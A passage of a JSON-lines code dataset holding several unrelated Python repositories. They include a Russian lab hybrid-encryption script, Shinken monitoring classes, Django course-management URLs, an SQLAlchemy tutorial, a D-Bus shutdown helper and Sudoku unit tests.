Записывает по указанному пути в файл сгенерированный случайный ключ.\n Returns\n --------\n bytes: сгенерированный симметричный ключ\n \"\"\"\n key = os.urandom(16)\n return key\n\n\ndef generation_asymmetric_keys() -> None:\n \"\"\"\n Записывает по указанным путям в файл сгенерированные асимметричные открытый и закрытый ключи.\n Parameters\n ----------\n \"\"\"\n keys = rsa.generate_private_key(\n public_exponent=65537,\n key_size=2048\n )\n private_key = keys\n print(type(private_key))\n public_key = keys.public_key()\n print(\"Асимметричные ключи созданы!\\n\")\n path_open_key = input(\"Введите путь для сохранения открытого ключа в файл: \\n\")\n with open(path_open_key, 'wb') as public_out:\n public_out.write(public_key.public_bytes(encoding=serialization.Encoding.PEM,\n format=serialization.PublicFormat.SubjectPublicKeyInfo))\n path_close_key = input(\"Введите путь для сохранения закрытого ключа в файл: \\n\")\n with open(path_close_key, 'wb') as private_out:\n private_out.write(private_key.private_bytes(encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.TraditionalOpenSSL,\n encryption_algorithm=serialization.NoEncryption()))\n print(\"Асимметричные ключи записаны в файл!\\n\")\n\n\ndef symmetric_key_encryption(key) -> None:\n \"\"\"\n Считывает из файла сгенерированный симметричный ключ, шифрует его и\n записывает по указанному пути в файл зашифрованный симметричный ключ.\n \"\"\"\n path_open_key = input(\"Введите путь, где хранится открытый ключ: \")\n with open(path_open_key, \"rb\") as pem_in:\n public_bytes = pem_in.read()\n d_public_key = load_pem_public_key(public_bytes)\n print(d_public_key)\n c_key = d_public_key.encrypt(key,\n padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()), algorithm=hashes.SHA256(),\n label=None))\n en_key_path = input(\"Введите путь для сохранения зашифрованного симметричного ключа в файл: \")\n with open(en_key_path, \"wb\") as f:\n f.write(c_key)\n\n\ndef decryption_of_symmetric_key() -> None:\n \"\"\"\n Считывает из файла зашифрованный симметричный ключ, дешифрует его и\n записывает по указанному пути в файл.\n \"\"\"\n en_key_path = input(\"Введите путь зашифрованного ключа: \")\n with open(en_key_path, mode=\"rb\") as f:\n en_text = f.read()\n private_pem = input(\"Введите путь, по которому лежит файл с закрытым ключом: \")\n with open(private_pem, 'rb') as pem_in:\n private_bytes = pem_in.read()\n d_private_key = load_pem_private_key(private_bytes, password=None,)\n dc_key = d_private_key.decrypt(en_text,\n padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()), algorithm=hashes.SHA256(),\n label=None))\n print(\"Дешифрованный ключ: \", dc_key)\n\n\ndef set_iv_to_file() -> None:\n \"\"\"\n Генерирует ключ для щифрации и дещифрации текста и сохраняет его в бинарный файл.\n \"\"\"\n iv = os.urandom(8)\n print(type(iv))\n with open(\"iv.bin\", 'wb') as key_file:\n key_file.write(iv)\n\n\ndef get_iv() -> bytes:\n \"\"\"\n Считывает из файла ключ для щифрации и дешифрации текста.\n Returns\n --------\n bytes: сгенерированный ключ\n \"\"\"\n with open(\"iv.bin\", \"rb\") as f:\n result = f.read()\n return result\n\n\ndef text_encryption(key) -> None:\n \"\"\"\n Считывает текст из файла, шифрует его и сохраняет результат в файл по указанному пути\n \"\"\"\n text_ = \"\"\n path_text = input(\"Введите путь к тексту, который нужно зашифровать\\n\")\n with open(path_text, 'r', encoding='utf-8') as f:\n text_ = f.read()\n set_iv_to_file()\n iv = get_iv()\n padder = padding.ANSIX923(1024).padder()\n padded_text = padder.update(bytes(text_, 'utf-8')) + padder.finalize()\n cipher = Cipher(algorithms.CAST5(key), modes.CBC(iv))\n encryptor = cipher.encryptor()\n c_text = encryptor.update(padded_text) + encryptor.finalize()\n print(\"Текст зашифрован!\")\n save_to_file_text_encryption(c_text)\n\n\ndef text_decryption(key) -> None:\n \"\"\"\n Считывает из файла зашифрованный текст, дешифрует его и сохраняет результат в файл по указанному пути.\n \"\"\"\n path_en_text = input(\"Введите путь к зашифрованному тексту: \")\n with open(path_en_text, 'rb') as f:\n en_text = f.read()\n cipher = Cipher(algorithms.CAST5(key), modes.CBC(get_iv()))\n decryptor = cipher.decryptor()\n dc_text = decryptor.update(en_text) + decryptor.finalize()\n unpadder = padding.ANSIX923(1024).unpadder()\n unpadded_dc_text = unpadder.update(dc_text) + unpadder.finalize()\n print(unpadded_dc_text.decode(\"UTF-8\"))\n print(\"Текст расшифрован!\")\n save_to_file_text_descryption(unpadded_dc_text)\n\n\ndef save_to_file_text_encryption(c_text):\n \"\"\"\n Сохраняет зашифрованный текст в файл.\n Parameters\n ----------\n c_text: bytes\n зашифрованный текст\n \"\"\"\n path_text_en = input(\"Введите путь для сохранения зашифрованного текста\\n\")\n with open(path_text_en, 'wb') as f_text:\n f_text.write(c_text)\n\n\ndef save_to_file_text_descryption(ds_text):\n \"\"\"\n Сохраняет дешифрованный текст в файл.\n Parameters\n ----------\n ds_text: str\n дешифрованный текст\n \"\"\"\n path_text_ds = input(\"Введите путь для сохранения расшифрованного текста\\n\")\n with open(path_text_ds, 'w') as f:\n f.write(ds_text.decode(\"UTF_8\"))\n\n\nprint(\"Вас приветствует программа гибридной криптосистемы.\")\nend_of_the_work = False\nwhile not end_of_the_work:\n choice = int(input('Выберите номер опции,которую хоите применить:\\n1. Сгенерировать ключи\\n2. Зашифровать '\n 'текст/ключ\\n3.Дешифровать текст/ключ\\n4.Выход\\n'))\n if choice == 1:\n sym_key = generation_symmetric_key()\n generation_asymmetric_keys()\n print(\"Симметричный ключ:\", sym_key)\n if choice == 2:\n en_choice = int(input(\"Зашифровать:\\n1. Симметричный ключ\\n2. Текст\\n\"))\n if en_choice == 1:\n if sym_key is None:\n print(\"Шифрование ключа невозможно, т.к. он не сгенерирован!\")\n continue\n else:\n symmetric_key_encryption(sym_key)\n if en_choice == 2:\n if sym_key is None:\n print(\"Шифрование текста невозможно, т.к. не сгенерирован симметричный ключ!\")\n continue\n else:\n text_encryption(sym_key)\n if choice == 3:\n dc_choice = int(input(\"Дешифровать:\\n1. Симметричный ключ\\n2. Текст\\n\"))\n if dc_choice == 1:\n if sym_key is None:\n print(\"Дешифрование ключа невозможно, т.к. не сгенерирован симметричный ключ!\")\n continue\n else:\n decryption_of_symmetric_key()\n if dc_choice == 2:\n if sym_key is None:\n print(\"Дешифрование текста невозможно, т.к. не сгенерирован симметричный ключ!\")\n continue\n else:\n text_decryption(sym_key)\n if choice == 4:\n break\n cont = input(\"Продолжить работу программы? \")\n if cont == \"да\":\n continue\n if cont == \"нет\":\n end_of_the_work = True\n","repo_name":"RomanShafranyuk/Lab3_ISB","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9685,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"28928554201","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport six\nfrom shinken.objects.item import Item, Items\nfrom shinken.autoslots import AutoSlots\nfrom shinken.property import StringProp, ListProp\n\n\nclass ServiceExtInfo(six.with_metaclass(AutoSlots, Item)):\n\n id = 1 # zero is reserved for host (primary node for parents)\n my_type = 'serviceextinfo'\n\n # properties defined by configuration\n # *required: is required in conf\n # *default: default value if no set in conf\n # *pythonize: function to call when transforming string to python object\n # *fill_brok: if set, send to broker. there are two categories:\n # full_status for initial and update status, check_result for check results\n # *no_slots: do not take this property for __slots__\n # Only for the initial call\n # conf_send_preparation: if set, will pass the property to this function. It's used to \"flatten\"\n # some dangerous properties like realms that are too 'linked' to be send like that.\n # brok_transformation: if set, will call the function with the value of the property\n # the major times it will be to flatten the data (like realm_name instead of the realm object).\n properties = Item.properties.copy()\n properties.update({\n 'host_name': StringProp(),\n 'service_description': StringProp(),\n 'notes': StringProp(default=''),\n 'notes_url': StringProp(default=''),\n 'icon_image': StringProp(default=''),\n 'icon_image_alt': StringProp(default=''),\n })\n\n # Hosts macros and prop that give the information\n # the prop can be callable or not\n macros = {\n 'SERVICEDESC': 'service_description',\n 'SERVICEACTIONURL': 'action_url',\n 'SERVICENOTESURL': 'notes_url',\n 'SERVICENOTES': 'notes'\n }\n\n#######\n# __ _ _ _\n# / _(_) | | (_)\n# ___ ___ _ __ | |_ _ __ _ _ _ _ __ __ _| |_ _ ___ _ __\n# / __/ _ \\| '_ \\| _| |/ _` | | | | '__/ _` | __| |/ _ \\| '_ \\\n# | (_| (_) | | | | | | | (_| | |_| | | | (_| | |_| | (_) | | | |\n# \\___\\___/|_| |_|_| |_|\\__, |\\__,_|_| \\__,_|\\__|_|\\___/|_| |_|\n# __/ |\n# |___/\n######\n\n\n # Check is required prop are set:\n # host_name is needed\n def is_correct(self):\n state = True\n cls = self.__class__\n\n return state\n\n # For get a nice name\n def get_name(self):\n if not self.is_tpl():\n try:\n return self.host_name\n except AttributeError: # outch, no hostname\n return 'UNNAMEDHOST'\n else:\n try:\n return self.name\n except AttributeError: # outch, no name for this template\n return 'UNNAMEDHOSTTEMPLATE'\n\n # For debugging purpose only\n def get_dbg_name(self):\n return self.host_name\n\n # Same but for clean call, no debug\n def get_full_name(self):\n return self.host_name\n\n\n# Class for the hosts lists. It's mainly for configuration\n# part\nclass ServicesExtInfo(Items):\n name_property = \"host_name\" # use for the search by name\n inner_class = ServiceExtInfo # use for know what is in items\n\n # Merge extended host information into host\n def merge(self, services):\n for ei in self:\n if hasattr(ei, 'register') and not getattr(ei, 'register'):\n # We don't have to merge template\n continue\n hosts_names = ei.get_name().split(\",\")\n for host_name in hosts_names:\n s = services.find_srv_by_name_and_hostname(host_name, ei.service_description)\n if s is not None:\n # FUUUUUUUUUUsion\n self.merge_extinfo(s, ei)\n\n def merge_extinfo(self, service, extinfo):\n properties = ['notes', 'notes_url', 'icon_image', 'icon_image_alt']\n # service properties have precedence over serviceextinfo properties\n for p in properties:\n if getattr(service, p) == '' and getattr(extinfo, p) != '':\n setattr(service, p, getattr(extinfo, p))\n","repo_name":"shinken-solutions/shinken","sub_path":"shinken/objects/serviceextinfo.py","file_name":"serviceextinfo.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","stars":1133,"dataset":"github-code","pt":"39"} +{"seq_id":"7697137246","text":"# -*- coding:utf-8 -*-\n\nfrom observers.menus import Menus\n\nimport config as CONFIG\n\nclass Rule(Menus):\n def __init__(self, function_) -> None:\n return function_(CONFIG.rule_word, self)\n def handle(self, data, users):\n result = ''\n openid = data['UserName']\n content = data['Content']\n id_ = users.get(openid, -1)\n\n # 查询规则\n if id_ == 0:\n result += CONFIG.rule_text\n users[openid] = 2\n\n # 确认查询规则,展示规则菜单\n elif id_ == 2:\n if content != '1' or content != '是的':\n return CONFIG.find_text\n result += CONFIG.select_text\n for i, _ in enumerate(CONFIG.rule_text_map):\n result += '\\t{}:【{}】\\n'.format(i+1, _)\n users[openid] = 20\n \n # 根据用户输入序号展示详细规则\n elif id_ == 20:\n if content in [str(i) for i in range(len(CONFIG.rule_index_map))]:\n result += CONFIG.rule_index_map.get(int(content), '')\n elif content in CONFIG.rule_text_map:\n result += CONFIG.rule_text_map.get(content, '')\n else:\n return CONFIG.find_text\n \n result += '{}:【{}】'.format(0, '返回')\n return result\n","repo_name":"dTIris/wechat_robot","sub_path":"observers/rule.py","file_name":"rule.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"44400444194","text":"#!/usr/bin/python3\n\nclass misMatchFlagError(Exception):\n \"\"\"Raised when flag did not match\"\"\"\n pass\n\n\ndef shutOff():\n import dbus\n sys_bus = dbus.SystemBus()\n lg = sys_bus.get_object('org.freedesktop.login1','/org/freedesktop/login1')\n pwr_mgmt = dbus.Interface(lg,'org.freedesktop.login1.Manager')\n shutdown_method = pwr_mgmt.get_dbus_method(\"PowerOff\")\n shutdown_method(True)\n\n\ndef power_flag(flag):\n \"\"\"Set Your Flag loose, follow, strict\"\"\"\n try:\n if flag == 'loose':\n return 30\n elif flag == 'follow':\n return 15\n elif flag == 'strict':\n return 10\n else :\n raise misMatchFlagError\n except misMatchFlagError as me:\n return \"Flag Did not match give any one from this 'loose' or 'follow' or 'strict'\"\n\n\ndef activity(*args,**kwargs):\n s= args\n return list(set([x for x in s[0] if s[0].count(x) > s[1]-1]))\n\n\n","repo_name":"ShivaGuntuku/Monitor-System-Activity","sub_path":"power_off.py","file_name":"power_off.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"4353205839","text":"from imports import *\n\ndef amd_dataloader(train_ds,val_ds,bs_train = 16,bs_val = 16):\n\n split = ShuffleSplit(n_splits=1,test_size=0.2,random_state=10)\n ids = range(len(train_ds))\n for idx_train,idx_val in split.split(ids):\n print(len(idx_train),len(idx_val))\n\n train_ds = Subset(train_ds,idx_train)\n val_ds = Subset(val_ds,idx_val)\n \n train_dl = DataLoader(train_ds,batch_size=bs_train,shuffle=True)\n val_dl = DataLoader(val_ds,batch_size=bs_val,shuffle=True)\n\n return train_dl, val_dl\n\n\n\n","repo_name":"DEVx96/iChallenge-AMD","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"24160665760","text":"import os\nimport pickle\nimport pathlib\n\nimport torch\n\n\ndef to_list(tensor):\n return tensor.detach().cpu().tolist()\n\n\ndef to_tensor(vector):\n # Something is wrong with this and I have no idea what\n tensor = torch.tensor(vector, dtype=torch.float)\n return tensor\n # return torch.Tensor(vector, dtype=torch.float)\n\n\ndef torch_save(vector, filename, overwrite=False):\n if os.path.exists(filename) and not overwrite:\n print(f\"{filename} already exists! Please use overwrite flag.\")\n else:\n create_path(filename)\n torch.save(torch.tensor(vector, dtype=torch.float), filename)\n\n\ndef torch_load(filename, to_gpu=False):\n if os.path.exists(filename):\n if to_gpu:\n return torch.load(filename)\n return torch.load(filename, map_location=torch.device(\"cpu\"))\n else:\n print(f\"{filename} does not exist!\")\n\n\ndef pickle_save(vector, filename, overwrite=False):\n if os.path.exists(filename) and not overwrite:\n print(f\"{filename} already exists! Please use overwrite flag.\")\n else:\n create_path(filename)\n pickle.dump(vector, open(filename, \"wb\"))\n\n\ndef pickle_load(filename):\n if os.path.exists(filename):\n with open(filename, \"rb\") as f:\n return pickle.load(f)\n else:\n print(f\"{filename} does not exist!\")\n\n\ndef create_path(pathname: str) -> None:\n \"\"\"Creates the directory for the given path if it doesn't already exist.\"\"\"\n dir = str(pathlib.Path(pathname).parent)\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n\ndef fewshot_filename(*paths) -> str:\n \"\"\"Given a path relative to this project's top-level directory, returns the\n full path in the OS.\n\n Args:\n paths: A list of folders/files. These will be joined in order with \"/\"\n or \"\\\" depending on platform.\n\n Returns:\n The full absolute path in the OS.\n \"\"\"\n # First parent gets the scripts directory, and the second gets the top-level.\n result_path = pathlib.Path(__file__).resolve().parent.parent\n for path in paths:\n result_path /= path\n return str(result_path)\n","repo_name":"fastforwardlabs/few-shot-text-classification","sub_path":"fewshot/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"19"} +{"seq_id":"72745503084","text":"import json\nimport requests\n\n\ndef post(image_path,is_url,server_path):\n headers = {\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'\n }\n request_body = {'adress':image_path,'is_url':is_url}\n body = json.dumps(request_body)\n content = requests.post(server_path,body,headers=headers)\n return content.json()\nif __name__ == '__main__':\n print(post(image_path ='https://dss3.bdstatic.com/70cFv8Sh_Q1YnxGkpoWK1HF6hhy/it/u=1208538952,1443328523&fm=26&gp=0.jpg',\\\n server_path='http://127.0.0.1:8888/model/array_cls',\\\n is_url=True))\n\n","repo_name":"ZSharp7/YoloV3-TF","sub_path":"tornado_client.py","file_name":"tornado_client.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74468629482","text":"languages = {\"html\",\"css\",\"js\",\"bootstrap\"}\n\n# counter =1\n# for language in languages:\n# print(str(counter) +\" : \"+language)\n# counter+=1\ni =1\njson = {\"name\": \"Coder Shiyar\" , \"age\" : 21 ,\"country\":\"Netherlands\" }\nfor data in json :\n if data == \"age\": \n break\n print(str(i) +\" : \"+ str(json[data]))\n i+=1\nelse:\n print(\"اكتمل من عرض بيانات ضمن فور لوب\")","repo_name":"codershiyar/python","sub_path":"LES23/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"19"} +{"seq_id":"39980324421","text":"\"\"\"lms URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom homepage.views import *\nfrom curriculo.views import *\nfrom restrito.views import *\nfrom contas.views import *\n\nurlpatterns = [\n path('', index),\n #path('cursos//', curso),\n # path('/', disciplina), \n #path('/disciplinas/', listadisciplina),\n #path('nova_disciplina/', nova_disciplina),\n #path('novo_curso/', novo_curso),\n########################### CONTAS ##################################\n path('lista_curriculo/', lista_curriculo),\n path('cursos/', cursos_lista),\n path(\"cursos/incluir/\", incluirCurso),\n path(\"cursos/remover/\", removerCurso),\n path(\"cursos/alterar/\", alterarCurso),\n path('disciplina/', disciplina),\n path('disciplina/incluir/', incluirDisciplina),\n path(\"disciplina/alterar/\", alterarDisciplina),\n path(\"disciplina/remover/\", removerDisciplina),\n path(\"disciplina_ofertada/\", disciplinaOfertada_lista),\n path(\"disciplina_ofertada/incluir/\", incluirDisciplinaOfertada),\n path(\"disciplina_ofertada/alterar//\", alterarDisciplinaOfertada),\n path(\"disciplina_ofertada/remover//\", removerDisciplinaOfertada),\n########################### CURRICULO ###################################\n path('lista_contas/', lista_contas),\n path('contas/Aluno/', Aluno),\n path('contas/Aluno/incluir/', incluirAluno),\n path(\"Aluno/alterar/\", alterarAluno),\n path(\"Aluno/remover/\", removerAluno),\n path('contas/Professor/', Professor),\n path('contas/Professor/incluir/', incluirProfessor),\n path(\"Professor/alterar/\", alterarProfessor),\n path(\"Professor/remover/\", removerProfessor),\n path('contas/Coordenador/', Coordenador),\n path('contas/Coordenador/incluir/', incluirCoordenador),\n path(\"Coordenador/alterar/\", alterarCoordenador),\n path(\"Coordenador/remover/\", removerCoordenador),\n path('contas/Mensagem/', Mensagem),\n path('contas/Mensagem/incluir/', incluirMensagem),\n path(\"Mensagem/alterar/\", alterarMensagem),\n path(\"Mensagem/remover/\", removerMensagem),\n########################## RESTRITO #######################################\n path('lista_restrito/', lista_restrito),\n path('atividade/', Atividade),\n path(\"atividade/incluir/\", incluirAtividade),\n path(\"atividade/alterar/\", alterarAtividade),\n path(\"atividade/remover/\", removerAtividade),\n path('atividade_vinculada/', atividade_vinculada),\n path('atividade_vinculada/incluir/', incluiratividade_vinculada),\n path('atividade_vinculada/alterar/', alteraratividade_vinculada),\n path('atividade_vinculada/remover/', removeratividade_vinculada),\n path('entrega/', entrega_lista),\n path('entrega/incluir/', incluir_entrega),\n path('entrega/alterar/', alterar_entrega),\n path('entrega/remover/', remover_entrega),\n path('solicitacao_matricula/', solicitacao_matricula_lista),\n path('solicitacao_matricula/incluir/', incluir_solicitacao_matricula),\n path('solicitacao_matricula/alterar/', alterar_solicitacao_matricula),\n path('solicitacao_matricula/remover/', remover_solicitacao_matricula),\n path('admin/', admin.site.urls),\n path('login/',login),\n]\n","repo_name":"guilhermegdf/Sistema-de-faculdade---Django","sub_path":"docs/lms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24149354230","text":"\"\"\"\nGrid Challenge\nGiven a square grid of characters in the range ascii[a-z], \nrearrange elements of each row alphabetically, ascending. \nDetermine if the columns are also in ascending alphabetical order, \ntop to bottom. Return YES if they are or NO if they are not.\n\"\"\"\n\"\"\"\n1. 모든 row에 대해서 sort를 한다\n2. col에 대해 오름차순으로 정렬이 되어 있는지 확인한다.\n\"\"\"\n\n\ndef gridChallenge(grid):\n # create matrix\n matrix = []\n for i in range(len(grid)):\n row = []\n\n for j in range(len(grid[0])):\n row.append(grid[i][j])\n\n row.sort()\n matrix.append(row)\n\n # check col if col is arranged in ascending\n for j in range(len(matrix[0])):\n col = []\n\n for i in range(len(matrix)):\n col.append(matrix[i][j])\n\n if col != sorted(col):\n return \"NO\"\n\n return \"YES\"\n","repo_name":"mrbartrns/algorithm-v2","sub_path":"hackerrank/preparation-kit/day4-1.py","file_name":"day4-1.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"19023532403","text":"import tensorflow as tf\n\na = tf.constant(5,name=\"inputa\")\nb = tf.constant(4,name = \"inputb\")\nc = tf.multiply(a,b,name =\"mul\")\nd = tf.add(a,b,name = \"add\")\ne = tf.add(c,d,name= \"final\")\n\nsess = tf.Session()\nsess.run(e)\nwriter = tf.summary.FileWriter('./graph',sess.graph)\nwriter.close()\nsess.close()\n","repo_name":"priyankanagaraj1494/ML_basic_codes","sub_path":"Graphs/sample2.py","file_name":"sample2.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23994391399","text":"#!/usr/bin/env python3\n\nfrom datetime import datetime\n\nfrom sqlalchemy import (\n create_engine,\n desc,\n func,\n CheckConstraint,\n PrimaryKeyConstraint,\n UniqueConstraint,\n Index,\n Column,\n DateTime,\n Integer,\n String,\n)\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\nBase = declarative_base()\n\n\nclass Student(Base):\n __tablename__ = \"students\"\n __table_args__ = (\n PrimaryKeyConstraint(\"id\", name=\"id_pk\"),\n UniqueConstraint(\"email\", name=\"unique_email\"),\n CheckConstraint(\"grade BETWEEN 1 AND 12\", name=\"grade_between_1_and_12\"),\n )\n\n Index(\"index_name\", \"name\")\n\n id = Column(Integer())\n name = Column(String())\n email = Column(String(55))\n grade = Column(Integer())\n birthday = Column(DateTime())\n enrolled_date = Column(DateTime(), default=datetime.now())\n\n # id = Column(Integer(), primary_key=True)\n # name = Column(String())\n\n def __repr__(self) -> str:\n return f\"Student {self.id}: \" + f\"{self.name}, \" + f\"Grade {self.grade}\"\n\n\nif __name__ == \"__main__\":\n engine = create_engine(\"sqlite:///:memory:\")\n Base.metadata.create_all(engine)\n\n # use our engine to configure a 'Session' class\n Session = sessionmaker(bind=engine)\n # use 'Session' class to create 'session' object\n session = Session()\n\n albert_einstein = Student(\n name=\"Albert Einstein\",\n email=\"albert.einstein@zurich.edu\",\n grade=6,\n birthday=datetime(year=1879, month=3, day=14),\n )\n\n alan_turing = Student(\n name=\"Alan Turing\",\n email=\"alan.turing@sherborne.edu\",\n grade=11,\n birthday=datetime(year=1912, month=6, day=23),\n )\n\n session.bulk_save_objects([albert_einstein, alan_turing])\n session.commit()\n\n # create session, student objects\n\n students = session.query(Student).all()\n print(students)\n\n # we can specify this in the arguments we pass to query()\n names = [name for name in session.query(Student.name)]\n print(names)\n\n # By default, results from any database query are ordered by their primary key.\n # The order_by() method allows us to sort by any column:\n students_by_name = [student for student in session.query(Student.name).order_by(Student.name)]\n print(students_by_name)\n\n # To sort results in descending order, we need to use the desc() function from the sqlalchemy module:\n students_by_grade_desc = [\n student for student in session.query(Student.name, Student.grade).order_by(desc(Student.grade))\n ]\n\n print(students_by_grade_desc)\n\n # To limit your result set to the first x records, you can use the limit() method:\n oldest_student = [\n student for student in session.query(Student.name, Student.birthday).order_by(desc(Student.grade)).limit(1)\n ]\n\n print(oldest_student)\n\n # The first() method\n oldest_student = session.query(Student.name, Student.birthday).order_by(desc(Student.grade)).first()\n\n print(oldest_student)\n\n # func from sqlalchemy gives us access to common SQL operations through functions like sum() and count()\n student_count = session.query(func.count(Student.id)).first()\n\n print(student_count)\n\n # Retrieving specific records requires use of the filter() method.\n query = session.query(Student).filter(Student.name.like(\"%Alan%\"), Student.grade == 11)\n\n for record in query:\n print(record.name)\n\n # use Python to modify objects directly and then commit those changes through the session.\n for student in session.query(Student):\n student.grade += 1\n\n session.commit()\n\n print([(student.name, student.grade) for student in session.query(Student)])\n\n # delete() method.\n query = session.query(Student).filter(Student.name == \"Albert Einstein\")\n\n # ------------ retrieve first matching record as object\n albert_einstein = query.first()\n\n # ------------ delete record\n session.delete(albert_einstein)\n session.commit()\n\n # ------------ try to retrieve deleted record\n albert_einstein = query.first()\n\n print(albert_einstein)\n\n # -------------you can call the delete() method from your query instead\n query = session.query(Student).filter(Student.name == \"Albert Einstein\")\n\n query.delete()\n\n albert_einstein = query.first()\n\n print(albert_einstein)\n","repo_name":"Cnnjuguna/python-p3-crud-with-sqlalchemy","sub_path":"lib/sqlalchemy_sandbox.py","file_name":"sqlalchemy_sandbox.py","file_ext":"py","file_size_in_byte":4366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"16787332717","text":"def count_disjoint(graph, endpoints):\n seen = set()\n count = 0\n for e in range(endpoints):\n if e not in seen:\n count += 1\n\n queue = [e]\n while queue:\n node = queue.pop(0)\n seen.add(node)\n neighbors = graph[node]\n queue.extend([n for n in neighbors if n not in seen])\n\n return count\n\n\ndef main():\n cities = int(input())\n for _ in range(cities):\n endpoints = int(input())\n graph = {i: set() for i in range(endpoints)}\n roads = int(input())\n for _ in range(roads):\n start, end = map(int, input().split())\n graph[start].add(end)\n graph[end].add(start)\n\n print(count_disjoint(graph, endpoints) - 1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ecly/kattis","sub_path":"reachableroads/reachableroads.py","file_name":"reachableroads.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"20259549746","text":"import unittest\nfrom unittest.mock import patch\n\nfrom sudoku_UI import *\n\n\nclass Test(unittest.TestCase):\n def setUp(self):\n self.sudoku = Sudoku()\n\n @patch(\"builtins.input\", side_effect=[0, 0, 1])\n @patch(\"builtins.print\")\n def testCase_is_number_in_SubSquare_Exception(self, mock_print, mock_inputs):\n\n play(self.sudoku)\n mock_print.assert_called_with(\n \"\\x1b[95mThe specified number is already in the square\\x1b[0m\\n\"\n )\n\n @patch(\"builtins.input\", side_effect=[1, 0, 8])\n @patch(\"builtins.print\")\n def testCase_is_number_in_Column_Exception(self, mock_print, mock_inputs):\n\n play(self.sudoku)\n mock_print.assert_called_with(\n \"\\x1b[95mThe specified number is already in the column\\x1b[0m\\n\"\n )\n\n @patch(\"builtins.input\", side_effect=[1, 0, 4])\n @patch(\"builtins.print\")\n def testCase_is_number_in_Row_Exception(self, mock_print, mock_inputs):\n\n play(self.sudoku)\n mock_print.assert_called_with(\n \"\\x1b[95mThe specified number is already in the row\\x1b[0m\\n\"\n )\n\n @patch(\"builtins.input\", side_effect=[1, 10, 1])\n @patch(\"builtins.print\")\n def testCase_check_column_Exception(self, mock_print, mock_inputs):\n\n play(self.sudoku)\n mock_print.assert_called_with(\n \"\\x1b[95mWrong number of row / column. Try again.\\x1b[0m\\n\"\n )\n\n @patch(\"builtins.input\", side_effect=[10, 1, 1])\n @patch(\"builtins.print\")\n def testCase_check_row_Exception(self, mock_print, mock_inputs):\n\n play(self.sudoku)\n mock_print.assert_called_with(\n \"\\x1b[95mWrong number of row / column. Try again.\\x1b[0m\\n\"\n )\n\n @patch(\"builtins.input\", side_effect=[1, 10, \"a\"])\n @patch(\"builtins.print\")\n def testCase_check_input_2(self, mock_print, mock_inputs):\n\n play(self.sudoku)\n mock_print.assert_called_with(\n \"\\x1b[95m Wrong input. Try again.\\x1b[0m\\n\")\n\n # @patch(\"builtins.input\", side_effect=[10, 1, 0])\n # @patch(\"builtins.print\")\n # def testCase_check_square_Exception(self, mock_print, mock_inputs):\n #\n with self.assertRaises(InvalidSquareException):\n self.sudoku.check_square(number=1, row=1, column=1)\n\n @patch(\"builtins.input\", side_effect=[1, 0, 2])\n @patch(\"builtins.print\")\n def testCase_check_square(self, mock_print, mock_inputs):\n\n play(self.sudoku)\n mock_print.assert_called_with(\"\\x1b[92mWell Done\\x1b[0m\")\n\n @patch(\"builtins.input\", side_effect=[8, 8, 6])\n @patch(\"builtins.print\")\n def testCase_user_has_won(self, mock_print, mock_input):\n\n self.sudoku.board = [\n [1, 8, 9, 5, 4, 7, 6, 2, 3],\n [2, 3, 7, 8, 6, 1, 5, 9, 4],\n [4, 5, 6, 9, 3, 2, 7, 1, 8],\n [3, 2, 1, 6, 9, 4, 8, 5, 7],\n [5, 6, 4, 1, 7, 8, 9, 3, 2],\n [9, 7, 8, 3, 2, 5, 4, 6, 1],\n [6, 1, 3, 4, 8, 9, 2, 7, 5],\n [7, 4, 5, 2, 1, 6, 3, 8, 9],\n [8, 9, 2, 7, 5, 3, 1, 4, 0],\n ]\n play(self.sudoku)\n 